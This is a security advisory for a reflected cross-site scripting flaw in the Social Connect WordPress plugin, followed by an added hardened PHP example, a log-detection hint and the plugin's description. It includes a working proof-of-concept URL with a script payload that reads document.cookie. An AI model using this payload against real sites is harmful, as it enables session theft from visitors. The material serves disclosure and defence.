wp-plugin : social-connect – A3-Cross-Site Scripting (XSS)

Plugin Details

Plugin Name : social-connect

Affected Version : 1.0.4 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Prajal Kulkarni

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC (Proof of Concept) :

The `testing` query parameter of the plugin's diagnostics/test.php script is reflected into the response without output encoding. In the request below, the URL-encoded value `testing'><script>alert(document.cookie)</script>` closes the attribute and tag it is reflected into and injects a script element, so any visitor who follows a crafted link runs attacker-supplied JavaScript in the site's origin:

http://127.0.0.1/wordpress/wp-content/wp-plugs/socialconnect/diagnostics/test.php?testing=testing%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
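As an added illustration (not code from the Social Connect plugin), the following shows the defensive pattern that closes this class of bug in a WordPress diagnostics page: refuse direct requests to the script, require an administrator, and encode the reflected value for its output context. The file layout, the markup and the `sc_diag_render_testing` helper are hypothetical; `testing` is the parameter name from the PoC; `esc_attr()`, `esc_html()`, `sanitize_text_field()`, `wp_unslash()`, `current_user_can()` and `wp_die()` are standard WordPress API functions.

```php
<?php
/**
 * Hypothetical hardened diagnostics page (added example, not the plugin's code).
 * Demonstrates the three controls that break the reflected XSS shown above:
 *   1. the script cannot be requested directly, only through WordPress;
 *   2. only administrators may reach the diagnostic output;
 *   3. the reflected value is encoded for each output context.
 */

// 1. Refuse direct requests such as /wp-content/.../diagnostics/test.php?testing=...
//    ABSPATH is only defined when WordPress itself has loaded this file.
defined( 'ABSPATH' ) || exit;

// 2. A diagnostic page should never be reachable unauthenticated.
if ( ! current_user_can( 'manage_options' ) ) {
    wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
}

/**
 * Render the echoed test value safely.
 *
 * Unsafe pattern this replaces (the shape the PoC payload implies, since its
 * leading '> closes a single-quoted attribute and its tag):
 *     echo "<input type='text' value='" . $_GET['testing'] . "'>";
 */
function sc_diag_render_testing( $raw ) {
    // wp_unslash() removes the slashes WordPress adds to request data;
    // sanitize_text_field() strips tags, control characters and surrounding space.
    $value = sanitize_text_field( wp_unslash( (string) $raw ) );

    // 3. Encode per context. esc_attr() escapes & < > " ' for attribute values,
    //    so the value cannot terminate the quote or the tag; esc_html() does the
    //    same for element content.
    return "<input type='text' name='testing' value='" . esc_attr( $value ) . "'>"
         . '<p>Received: ' . esc_html( $value ) . '</p>';
}

echo sc_diag_render_testing( isset( $_GET['testing'] ) ? $_GET['testing'] : '' );
```

Of the three controls, `esc_attr()` alone is sufficient to neutralise the attribute breakout in the PoC; the `ABSPATH` guard is what removes the unauthenticated direct-request path the advisory relies on, and a release that ships diagnostic or test scripts at all deserves a second look. For a retrospective check, web server access logs for requests to diagnostics/test.php whose query string contains a URL-encoded `<script` (`%3Cscript`) are the simplest place to start.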

 

Disclosure Timeline

Vendor Contacted : 2014-01-21

Plugin Status : Updated on 2014-01-11

Public Disclosure : April 25, 2014

CVE Number : CVE-2014-4551

Plugin Description :

Social Connect adds social login buttons on the login, register and comment forms of your WordPress site.

The buttons offer login and registration using a Twitter, Facebook, Google, Yahoo or WordPress.com account.

It makes it super easy for new members to register with your site and existing members to log in.

= Props =

Special thanks to:

* [markusdrake](http://wordpress.org/support/profile/markusdrake) for patches and helping in the support forums;
* [L D](http://wordpress.org/support/profile/enochfung) for patches and helping in the support forums;
* [Geodanny](http://wordpress.org/support/profile/geodanny) for helping in the support forums; and
* [Wirone](http://blog.wirone.info/) for the Polish translation and patches.

And everyone else in the forums sharing the fixes they find and answering each other's questions.

= Contribute =

Social Connect is rapidly growing in popularity and help with the growing pains is appreciated.

If you're a developer, you can contribute fixes & optimisations via [Social Connect on GitHub](https://github.com/thenbrent/social-connect).

Everyone can help out by answering questions in the [Support Forums](http://wordpress.org/tags/social-connect?forum_id=10#postform).
